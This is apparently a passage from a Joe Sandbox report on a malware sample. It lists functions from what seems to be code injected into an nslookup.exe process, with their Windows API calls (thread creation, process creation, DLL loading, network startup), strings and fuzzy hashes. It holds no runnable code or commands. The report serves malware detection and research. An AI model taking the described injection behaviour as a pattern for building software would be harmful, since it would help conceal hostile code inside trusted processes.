                                  control_flow_graph 577 2a609dc-2a609de 578 2a609e0-2a609e7 577->578 579 2a60a3e-2a60a5a 577->579 578->579 580 2a60a5c-2a60a6b PostThreadMessageW 579->580 581 2a60a7a-2a60a80 579->581 580->581 582 2a60a6d-2a60a77 580->582 582->581
                                  APIs
                                  • PostThreadMessageW.USER32(7--93mK-,00000111,00000000,00000000), ref: 02A60A67
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: MessagePostThread
                                  • String ID: 7--93mK-$7--93mK-
                                  • API String ID: 1836367815-3783969520
                                  • Opcode ID: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction ID: aba2b236b6b3898af388bc5b3e168f4e8237ccce3b45c8005fdea0152eef8c4d
                                  • Opcode Fuzzy Hash: 24abfe0573eac7b940e217813fcc710d0e29d24c1cb178ef7aac01b434065fba
                                  • Instruction Fuzzy Hash: 29F0AE77E0014C7A5B11C7D5ACC19FDFB7CEA50194B0081A6ED18E7140D7364D4147A1
                                  Function 02A72A60 Relevance: 4.6, APIs: 1, Strings: 2, Instructions: 104sleepCOMMON
                                  Download Yara Rule
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02A72B2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: 50cbb292f3f5e4bf982e972e723b78504892de27675a4cd2942ae41bc8b9bdf6
                                  • Instruction ID: 2c5728b3000a3274d543d5b9fcf59a2b270f4aabfea1c5fde73211c496fce12a
                                  • Opcode Fuzzy Hash: 50cbb292f3f5e4bf982e972e723b78504892de27675a4cd2942ae41bc8b9bdf6
                                  • Instruction Fuzzy Hash: E1316CB1640705ABC724DF64DC84FE7BBB9EB88710F00852DEA5D5B241D770BA44CBA8
                                  Function 02A6BE66 Relevance: 3.2, APIs: 2, Instructions: 156fileCOMMON
                                  Download Yara Rule
                                  APIs
                                  • FindNextFileW.KERNELBASE(?,00000010), ref: 02A6BE4F
                                  • FindClose.KERNELBASE(?), ref: 02A6BE5A
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$CloseFileNext
                                  • String ID:
                                  • API String ID: 2066263336-0
                                  • Opcode ID: 4805fe4c81b7ff940da2359e3a145ed00e83533085aea2788a192e43205fae25
                                  • Instruction ID: bd53e421fc813ee2fc2587ac0ef4c96f6722d8a410bcfa81e2d6e50635bb3001
                                  • Opcode Fuzzy Hash: 4805fe4c81b7ff940da2359e3a145ed00e83533085aea2788a192e43205fae25
                                  • Instruction Fuzzy Hash: C8419671614686AFDB00DF74C889AFABF79FF46618B4808DED940DB522CB308941CBB1
                                  Function 02A6EAD6 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 105COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02A6EAF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 2b9c7ccdea0b5213595e6bca5b0a33fab94d937af711388513589fa2b7811775
                                  • Instruction ID: d64a078b7e3efcfa192ba2e4042a716315412bf5fb9620be0ab0fcc3a402cfb0
                                  • Opcode Fuzzy Hash: 2b9c7ccdea0b5213595e6bca5b0a33fab94d937af711388513589fa2b7811775
                                  • Instruction Fuzzy Hash: C2313276A0020AAFDB00DFD8D880DEFB7B9FF48304B108559E515EB214DB75EE458BA0
                                  Function 02A6EAE0 Relevance: 3.1, APIs: 1, Strings: 1, Instructions: 101COMMON
                                  Download Yara Rule
                                  APIs
                                  • CoInitialize.OLE32(00000000), ref: 02A6EAF7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Initialize
                                  • String ID: @J7<
                                  • API String ID: 2538663250-2016760708
                                  • Opcode ID: 543d971038487359dff5b5610849bd2c9d78b3619237ffd184eeb5d254223677
                                  • Instruction ID: 0dcac35e2cdcca18274cac67b674d7483c1095155a49660cfdc3f2dcd8f748a7
                                  • Opcode Fuzzy Hash: 543d971038487359dff5b5610849bd2c9d78b3619237ffd184eeb5d254223677
                                  • Instruction Fuzzy Hash: 8F311275A0060A9FDB00DFD8C880DEFB7B9FF48304B108559E515EB214DB75AE458BA0
                                  Function 02A615B0 Relevance: 1.8, APIs: 1, Instructions: 267networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: cc15fe335a8fc3bcbbfcf81d3a2545b3913cf7b55dd76b06a3d7e74545ac358e
                                  • Instruction ID: cec20fb0394e3c7014032d45e625ed213a29be209a011113e5e6c7518c46cf95
                                  • Opcode Fuzzy Hash: cc15fe335a8fc3bcbbfcf81d3a2545b3913cf7b55dd76b06a3d7e74545ac358e
                                  • Instruction Fuzzy Hash: 889180B1D40209EFDB14DFA5CD84BEEBBF9AF08304F14412AE508A7281EB706645CFA5
                                  Function 02A615A9 Relevance: 1.8, APIs: 1, Instructions: 265networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: ffcb588778199ee2a05fc759837fda0f3521b9bd603dcf2a099f4504a5d03b3f
                                  • Instruction ID: 9ff255578303445ac912d85ad755b544b2b9fbbb921aa82a9c86e7585081ffaf
                                  • Opcode Fuzzy Hash: ffcb588778199ee2a05fc759837fda0f3521b9bd603dcf2a099f4504a5d03b3f
                                  • Instruction Fuzzy Hash: 4E9180B1D40209EFDB10DFA5CD85BEEBBB9BF08304F14412AE508A7281EB706655CFA5
                                  Function 02A6180D Relevance: 1.6, APIs: 1, Instructions: 69networkCOMMON
                                  Download Yara Rule
                                  APIs
                                  • WSAStartup.WS2_32(00000202,?), ref: 02A618A1
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Startup
                                  • String ID:
                                  • API String ID: 724789610-0
                                  • Opcode ID: ecd1ee86b8d6e57b68b2a19455a759178b9cb642bf5dc3b5c2a2924c7803aa07
                                  • Instruction ID: e8e9258738364d65e4f6ada7d65ee8e32d3b51b52bc2683f6ebd0f46e2699f29
                                  • Opcode Fuzzy Hash: ecd1ee86b8d6e57b68b2a19455a759178b9cb642bf5dc3b5c2a2924c7803aa07
                                  • Instruction Fuzzy Hash: 4A11B271D41319AFDB11DBA48D81BEFB7F8AF09300F040056EA08B3241EB316A488BA9
                                  Function 02A5978D Relevance: 1.6, APIs: 1, Instructions: 57threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A597D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: b1f595f578e307b48e0e17b424240cdacd0a21a8e28d101fa833eeb776dd6a8d
                                  • Instruction ID: 6653862497eb43a70965a946a6bba104d5ff9871b4e71afe983f38ba1e8201b0
                                  • Opcode Fuzzy Hash: b1f595f578e307b48e0e17b424240cdacd0a21a8e28d101fa833eeb776dd6a8d
                                  • Instruction Fuzzy Hash: FC01D472681718B6E32166A48D43FEB7B6CCF41754F104056FA0CAA1C1DEB176414BE9
                                  Function 02A64390 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A64402
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction ID: 5d15c73672ef3867b89fd4342ccffbc2aef355b632546626003befdc35a756d9
                                  • Opcode Fuzzy Hash: c637b0a5039fee39120ea626e6d6813652200ddffb7808a4ed43236f6d148d2f
                                  • Instruction Fuzzy Hash: E2015EB5E4020DBBDB10EBE0ED85FEEB3B99B14308F0041A5E90897241FA30EB14CB91
                                  Function 02A782F0 Relevance: 1.5, APIs: 1, Instructions: 47processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateProcessInternalW.KERNELBASE(?,?,?,?,02A67C23,00000010,?,?,?,00000044,?,00000010,02A67C23,?,?,?), ref: 02A78353
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateInternalProcess
                                  • String ID:
                                  • API String ID: 2186235152-0
                                  • Opcode ID: 76313abf0d2183b6971281bcfa7a408c7bd84f0fbd4479c675105112f473c24a
                                  • Instruction ID: 64e032494f741811d3fb74cdd7a0b5e317836a08eeec1ce5b1d97d19222f8f88
                                  • Opcode Fuzzy Hash: 76313abf0d2183b6971281bcfa7a408c7bd84f0fbd4479c675105112f473c24a
                                  • Instruction Fuzzy Hash: 0D0184B2204108BFCB54DE99DC80EEB77AEAF8C754F418108BA19D3240DA30F8518BA4
                                  Function 02A59790 Relevance: 1.5, APIs: 1, Instructions: 38threadCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 02A597D5
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 95d7893bed7c4f881b3b89ea5b4bb853f94a2da6a27fad6951c0abd0fff2134f
                                  • Instruction ID: 10e0a491d95c28f7d7cabe81328f508b5634b262ac83a8256ad8c52a39c018f5
                                  • Opcode Fuzzy Hash: 95d7893bed7c4f881b3b89ea5b4bb853f94a2da6a27fad6951c0abd0fff2134f
                                  • Instruction Fuzzy Hash: 55F039B338061476E23066A99D42FD7A79D8B80BA1F14042AFA0CEA180D9A2B54146E9
                                  Function 02A78210 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlAllocateHeap.NTDLL(02A61609,?,02A74E2B,02A61609,02A74577,02A74E2B,?,02A61609,02A74577,00001000,?,?,02A79A80), ref: 02A7824F
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateHeap
                                  • String ID:
                                  • API String ID: 1279760036-0
                                  • Opcode ID: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction ID: 302d02f98137c01b3e7dffa6d999af64046667c88022f09d0a61228fff672faf
                                  • Opcode Fuzzy Hash: 8fc0493a6e8bee40a610767ea931887b664697431e711198148b16c4f16402e4
                                  • Instruction Fuzzy Hash: 18E065B22402057FD610EE99DC41FAB33AEEFC9750F004019F909A7240CAB1B9108AB9
                                  Function 02A78260 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                  • RtlFreeHeap.NTDLL(00000000,00000004,00000000,00000ADC,00000007,00000000,00000004,00000000,02A63C78,000000F4,?,?,?,?,?), ref: 02A7829C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FreeHeap
                                  • String ID:
                                  • API String ID: 3298025750-0
                                  • Opcode ID: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction ID: 29209592e6d9414c3532a0ad3dd80a9e73d9d63aa01511d6b3e360d25e17de65
                                  • Opcode Fuzzy Hash: ebd85f2aa228cf2bf1eefa713117c3bd037453a5f3ab9d526bc395588c7853d4
                                  • Instruction Fuzzy Hash: DEE065B26142147FDA10EE58DC40FAB37AEEFC8790F008009FA08A7240CA71BD108AB8
                                  Function 02A67A70 Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                  Download Yara Rule
                                  APIs
                                  • SetErrorMode.KERNELBASE(00008003,?,?,02A618E0,02A76C97,02A74577,?), ref: 02A67AA3
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ErrorMode
                                  • String ID:
                                  • API String ID: 2340568224-0
                                  • Opcode ID: 0f4a2dbd57145b77c30f811737ff4f730e49110cc5a57daae660f2b8c464bb5f
                                  • Instruction ID: 33bf20d29c117537afb5d80d015493e749aa95e689eaae915bbe83800184f57f
                                  • Opcode Fuzzy Hash: 0f4a2dbd57145b77c30f811737ff4f730e49110cc5a57daae660f2b8c464bb5f
                                  • Instruction Fuzzy Hash: 2BD05EB13D02083FF610E7B4CD06F66328D8B40768F048068FA0CDB2C2EE66F20046A9
                                  Function 02A64383 Relevance: 1.5, APIs: 1, Instructions: 21libraryloaderCOMMON
                                  Download Yara Rule
                                  APIs
                                  • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 02A64402
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Load
                                  • String ID:
                                  • API String ID: 2234796835-0
                                  • Opcode ID: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction ID: 352b51974925f5f985a005499144ae562d1be6a5cd4173cbc5b8ddfbaca47f5c
                                  • Opcode Fuzzy Hash: 9a64fc1e66d337bad59ad5524a175d7d14ceeaed205581d9aa7de55f04977df5
                                  • Instruction Fuzzy Hash: FFE04F79A4000EABDF10CBD5D895FADB774AB48208F0441D1E818D7540EA30E604CB51
                                  Function 02A67C82 Relevance: 1.5, APIs: 1, Instructions: 14COMMON
                                  Download Yara Rule
                                  APIs
                                  • GetFileAttributesW.KERNELBASE ref: 02A67C8C
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4533032850.0000000002A50000.00000040.80000000.00040000.00000000.sdmp, Offset: 02A50000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_2a50000_nslookup.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AttributesFile
                                  • String ID:
                                  • API String ID: 3188754299-0
                                  • Opcode ID: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                  • Instruction ID: e24e109181f4d1b44d82a682d560f876bf933935260772e3c909a997b900231f
                                  • Opcode Fuzzy Hash: 564aa035bb14cd579d8a35bac1d316f849c36bbd2026ac6a66d21791aefd520a
                                  • Instruction Fuzzy Hash: A4C08C3223000804FB200AFC7C8C2B37349DB8233CF240E10F42CD94E0D72298A79000
                                  Function 031F2C0A Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMONLIBRARYCODE
                                  Download Yara Rule
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ad71bb8a76b499affd181d1f04ddf9e0239cd54e946aa8c5b7e04444d2d7ebe2
                                  • Instruction ID: bf08d1b50299be56280ff4406c89829906d66f1fa406e992ca859a563914d768
                                  • Opcode Fuzzy Hash: ad71bb8a76b499affd181d1f04ddf9e0239cd54e946aa8c5b7e04444d2d7ebe2
                                  • Instruction Fuzzy Hash: F1B092729029C9CAEB11E7604A08B1B7A04ABD0701F2AC4A2E3030686F4739C1D6E2B6

                                  Non-executed Functions

                                  Function 031F2890 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 190COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: 5b730e9856eca000c4ff40c84c2e99bbfebbe015395699584cb1eef81ade7e35
                                  • Instruction ID: 146cd35b8996281625afbb0104b495eafd71b5c1c046e7c9739b86905ac6da67
                                  • Opcode Fuzzy Hash: 5b730e9856eca000c4ff40c84c2e99bbfebbe015395699584cb1eef81ade7e35
                                  • Instruction Fuzzy Hash: 2C5117BAA00266BFCB10DB988C8097FFBF8BB0C2017148569E565D7641D774DE918BE0
                                  Function 03262410 Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 189COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
                                  • API String ID: 48624451-2108815105
                                  • Opcode ID: cbe8471d8823d169fc927c3a1e7c9cb70c28ee7e08215fc0ec82fb6512ec8f85
                                  • Instruction ID: f58bcc0455b6e6808276a88f5a920f156dd36e6ab4868d7ef8340fe3a74c681b
                                  • Opcode Fuzzy Hash: cbe8471d8823d169fc927c3a1e7c9cb70c28ee7e08215fc0ec82fb6512ec8f85
                                  • Instruction Fuzzy Hash: 8351D479A10746EFDB34DE9CC89097FBBB9AF48201B048C59E4A5D7681E7B4DAC08760
                                  Function 031E7630 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 194COMMON
                                  Download Yara Rule
                                  Strings
                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 032246FC
                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 03224655
                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 03224742
                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 03224725
                                  • ExecuteOptions, xrefs: 032246A0
                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 03224787
                                  • Execute=1, xrefs: 03224713
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                  • API String ID: 0-484625025
                                  • Opcode ID: 926caaa10e9d97085ae6d37548e1d03d1ae90196e86da37bcbc60a69d1bc679a
                                  • Instruction ID: 955620a301755d85dc666f5d496a4db967cfbc8cd567215db65ba845793944a0
                                  • Opcode Fuzzy Hash: 926caaa10e9d97085ae6d37548e1d03d1ae90196e86da37bcbc60a69d1bc679a
                                  • Instruction Fuzzy Hash: DB512875A00719BFFF15EAA4EC89FAE77B8AF0C704F0400A9D505AB1D1D7729A818F50
                                  Function 03286940 Relevance: 9.4, APIs: 6, Instructions: 416COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction ID: ace826c0fdd4a3f50a0fedd30e6059484503ff9de1a9bb979fa36a794848d369
                                  • Opcode Fuzzy Hash: 2a48bdd4d8ea14c469ad441b94cf96c101b09c67394ceba66eb56f2a3b9e53c1
                                  • Instruction Fuzzy Hash: 73023675519341AFC305EF28C490E6BBBE5EFC8704F14892DFA899B2A0DB71E945CB42
                                  Function 031FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: __aulldvrm
                                  • String ID: +$-$0$0
                                  • API String ID: 1302938615-699404926
                                  • Opcode ID: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction ID: 5de80e5584ed05d800a99209d1ba9704a491f1074f7427549f06d4c582746ce3
                                  • Opcode Fuzzy Hash: 53abcd45f1248799eb7edd6da4205106d70e70754ef1e870ff48280e40c18d32
                                  • Instruction Fuzzy Hash: A0818074E092499FDF28CE68C8517FEBBA6AF8D360F1CC259DA51A73D1C73498818B50
                                  Function 032620E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                  Download Yara Rule
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_5_2_3180000_nslookup.jbxd
                                  Similarity
                                  • API ID: ___swprintf_l
                                  • String ID: %%%u$[$]:%u
                                  • API String ID: 48624451-2819853543
                                  • Opcode ID: ca107017346949e5ee5fe5981fb38aaffce868bff49ba9a9ce19078f1d628006
                                  • Instruction ID: 483ac9df5e9cd62895ba9625aaa68b502dfeb5512456a700e65915ec712b829f
                                  • Opcode Fuzzy Hash: ca107017346949e5ee5fe5981fb38aaffce868bff49ba9a9ce19078f1d628006
                                  • Instruction Fuzzy Hash: 7921867AE102199BDB10DF69C840AEEB7E8AF48640F080555E915E7241E730DA818BA0
                                  Function 031DF5B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 382COMMON
                                  Download Yara Rule
                                  Strings
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 032202E7
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 032202BD
                                  • RTL: Re-Waiting, xrefs: 0322031E
                                  Memory Dump Source
                                  • Source File: 00000005.00000002.4540148046.0000000003180000.00000040.00001000.00020000.00000000.sdmp, Offset: 03180000, based on PE: true
                                  • Associated: 00000005.00000002.4540148046.00000000032A9000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.00000000032AD000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  • Associated: 00000005.00000002.4540148046.000000000331E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                  Joe Sandbox IDA Plugin
